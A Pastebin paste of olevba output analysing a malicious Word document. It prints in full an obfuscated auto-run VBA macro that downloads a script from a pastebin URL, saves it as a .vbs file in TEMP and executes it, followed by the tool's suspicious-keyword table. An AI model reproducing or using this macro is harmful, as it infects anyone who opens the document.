Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- MHT:MASI---V malware.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: malware.doc
- Type: MHTML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: None - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub BHJvsafccc()
- zzzzzccsdc
- End Sub
- Sub AutoOpen()
- BHJvsafccc
- End Sub
- Sub Workbook_Open()
- BHJvsafccc
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO nxc.bas
- in file: None - OLE stream: u'VBA/nxc'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub zzzzzccsdc()
- Dim bpXIphzr, ttRrcQMW, ONsvPyQD As String
- bpXIphzr = " MQPPSA "
- ttRrcQMW = LTrim(bpXIphzr)
- ONsvPyQD = RTrim(ttRrcQMW)
- mkHJBcsdf = "TEMP"
- Dim KllIoMIA, mRUZKkkX, OmDyVeER As String
- KllIoMIA = " LEFDRN "
- mRUZKkkX = LTrim(KllIoMIA)
- OmDyVeER = RTrim(mRUZKkkX)
- nBJaddff = "MSXML2.XMLHTTP"
- Dim gqwqjvQx, njifLsFU, vzQNJfmu As String
- gqwqjvQx = " TJBGXF "
- njifLsFU = LTrim(gqwqjvQx)
- vzQNJfmu = RTrim(njifLsFU)
- Set pIHJIasdf = CreateObject(nBJaddff)
- Dim RFsQJoJK, bFwCsdgL, wGYoYkSM As String
- RFsQJoJK = " WIICDV "
- bFwCsdgL = LTrim(RFsQJoJK)
- wGYoYkSM = RTrim(bFwCsdgL)
- pKKhbsac = "ttp"
- Dim IIeoErOJ, fEPEHbnO, uMAgYYHd As String
- IIeoErOJ = " YIJTPD "
- fEPEHbnO = LTrim(IIeoErOJ)
- uMAgYYHd = RTrim(fEPEHbnO)
- yDTYuadf = "://pas"
- Dim lKcgemiT, UIELoylf, XvOxgJTX As String
- lKcgemiT = " BTSWSM "
- UIELoylf = LTrim(lKcgemiT)
- XvOxgJTX = RTrim(UIELoylf)
- ihuHJJdsf = StrReverse(ChrW$(111) & ChrW$(99) & ChrW$(46) & ChrW$(110) & ChrW$(105) & ChrW$(98))
- Dim JlMkGXlV, enYmjOwo, aqpigQzU As String
- JlMkGXlV = " MWQKIN "
- enYmjOwo = LTrim(JlMkGXlV)
- aqpigQzU = RTrim(enYmjOwo)
- YGHvvdf = StrReverse(ChrW$(61) & ChrW$(105) & ChrW$(63) & ChrW$(112) & ChrW$(104) & ChrW$(112) & ChrW$(46) & ChrW$(100) & ChrW$(97) & ChrW$(111) & ChrW$(108) & ChrW$(110))
- Dim czsPxhrZ, lexXJlAR, grYisvBT As String
- czsPxhrZ = " KGICEA "
- lexXJlAR = LTrim(czsPxhrZ)
- grYisvBT = RTrim(lexXJlAR)
- mmmkMKNd = StrReverse(ChrW$(104)) + pKKhbsac + yDTYuadf + StrReverse(ChrW$(101) & ChrW$(116)) + ihuHJJdsf + StrReverse(ChrW$(119) & ChrW$(111) & ChrW$(100) & ChrW$(47) & ChrW$(109)) + YGHvvdf
- Dim jsfkixUg, XuWDmKby, nzEiIdjV As String
- jsfkixUg = " HSKAQR "
- XuWDmKby = LTrim(jsfkixUg)
- nzEiIdjV = RTrim(XuWDmKby)
- VHVisdfw = mmmkMKNd + StrReverse(ChrW$(51) & ChrW$(75) & ChrW$(84) & ChrW$(53) & ChrW$(100) & ChrW$(89) & ChrW$(114) & ChrW$(48))
- Dim eyzBsPgn, kXiZkwno, MuwxaLpZ As String
- eyzBsPgn = " KSADHZ "
- kXiZkwno = LTrim(eyzBsPgn)
- MuwxaLpZ = RTrim(kXiZkwno)
- Call pIHJIasdf.Open(StrReverse(ChrW$(84) & ChrW$(83) & ChrW$(79) & ChrW$(80)), VHVisdfw, False)
- Dim KDNLtWtz, tLSXYOod, jBvBocsc As String
- KDNLtWtz = " MTFYHN "
- tLSXYOod = LTrim(KDNLtWtz)
- jBvBocsc = RTrim(tLSXYOod)
- pIHJIasdf.Send
- Dim npjkobMZ, xqnREEkR, kqQHVIGT As String
- npjkobMZ = " MLQFXY "
- xqnREEkR = LTrim(npjkobMZ)
- kqQHVIGT = RTrim(xqnREEkR)
- dyEYTasd = StrReverse(ChrW$(116) & ChrW$(99) & ChrW$(101) & ChrW$(106) & ChrW$(98) & ChrW$(79) & ChrW$(109) & ChrW$(101) & ChrW$(116) & ChrW$(115) & ChrW$(121) & ChrW$(83) & ChrW$(101) & ChrW$(108) & ChrW$(105) & ChrW$(70) & ChrW$(46) & ChrW$(103) & ChrW$(110) & ChrW$(105) & ChrW$(116) & ChrW$(112) & ChrW$(105) & ChrW$(114) & ChrW$(99) & ChrW$(83))
- Dim xeQAcRYS, aVlXPBcR, MgpUAyDi As String
- xeQAcRYS = " NKOFUN "
- aVlXPBcR = LTrim(xeQAcRYS)
- MgpUAyDi = RTrim(aVlXPBcR)
- Set nJHOsdff = CreateObject(dyEYTasd)
- Dim aLlTJBDR, EtIbnxxB, KMFeTiIU As String
- aLlTJBDR = " HTPEYP "
- EtIbnxxB = LTrim(aLlTJBDR)
- KMFeTiIU = RTrim(EtIbnxxB)
- yyYHJKsdfv = Environ(mkHJBcsdf) & StrReverse(ChrW$(115) & ChrW$(98) & ChrW$(118) & ChrW$(46) & ChrW$(115) & ChrW$(99) & ChrW$(99) & ChrW$(72) & ChrW$(66) & ChrW$(106) & ChrW$(110) & ChrW$(110) & ChrW$(92))
- Dim TGZPOwhL, JWgDsplr, eaaHDCwf As String
- TGZPOwhL = " FYZAYD "
- JWgDsplr = LTrim(TGZPOwhL)
- eaaHDCwf = RTrim(JWgDsplr)
- Set casasddd = nJHOsdff.CreateTextFile(yyYHJKsdfv, 2)
- Dim jJUevPkl, sKKhLGGl, iLzAfLdw As String
- jJUevPkl = " GPLURS "
- sKKhLGGl = LTrim(jJUevPkl)
- iLzAfLdw = RTrim(sKKhLGGl)
- casasddd.Write pIHJIasdf.responseText
- Dim HjjttiWj, msBbkESo, NuYMRVRa As String
- HjjttiWj = " EFMMOX "
- msBbkESo = LTrim(HjjttiWj)
- NuYMRVRa = RTrim(msBbkESo)
- casasddd.Close
- Dim XNaeMehp, vshCEnBR, DzwnIsqd As String
- XNaeMehp = " WLTCXT "
- vshCEnBR = LTrim(XNaeMehp)
- DzwnIsqd = RTrim(vshCEnBR)
- yytTcbcn = StrReverse(ChrW$(110) & ChrW$(111) & ChrW$(105) & ChrW$(116) & ChrW$(97) & ChrW$(99) & ChrW$(105) & ChrW$(108) & ChrW$(112) & ChrW$(112) & ChrW$(65) & ChrW$(46) & ChrW$(108) & ChrW$(108) & ChrW$(101) & ChrW$(104) & ChrW$(83))
- Dim HzSBMocU, zivzwCnK, ffqtVPRe As String
- HzSBMocU = " LSUOQY "
- zivzwCnK = LTrim(HzSBMocU)
- ffqtVPRe = RTrim(zivzwCnK)
- Set chgdTYasd = CreateObject(yytTcbcn)
- chgdTYasd.Open Environ(mkHJBcsdf) & StrReverse(ChrW$(115) & ChrW$(98) & ChrW$(118) & ChrW$(46) & ChrW$(115) & ChrW$(99) & ChrW$(99) & ChrW$(72) & ChrW$(66) & ChrW$(106) & ChrW$(110) & ChrW$(110) & ChrW$(92))
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: None - OLE stream: u'VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class2.cls
- in file: None - OLE stream: u'VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class3.cls
- in file: None - OLE stream: u'VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class4.cls
- in file: None - OLE stream: u'VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class5.cls
- in file: None - OLE stream: u'VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class6.cls
- in file: None - OLE stream: u'VBA/Class6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class7.cls
- in file: None - OLE stream: u'VBA/Class7'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class8.cls
- in file: None - OLE stream: u'VBA/Class8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class9.cls
- in file: None - OLE stream: u'VBA/Class9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class10.cls
- in file: None - OLE stream: u'VBA/Class10'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class11.cls
- in file: None - OLE stream: u'VBA/Class11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | ChrW | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | StrReverse | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateTextFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Msxml2.XMLHTTP | May download files from the Internet |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command (obfuscation: VBA expression) |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) (obfuscation: VBA |
- | | | expression) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | nnjBHccs.vbs | Executable file name (obfuscation: VBA |
- | | | expression) |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
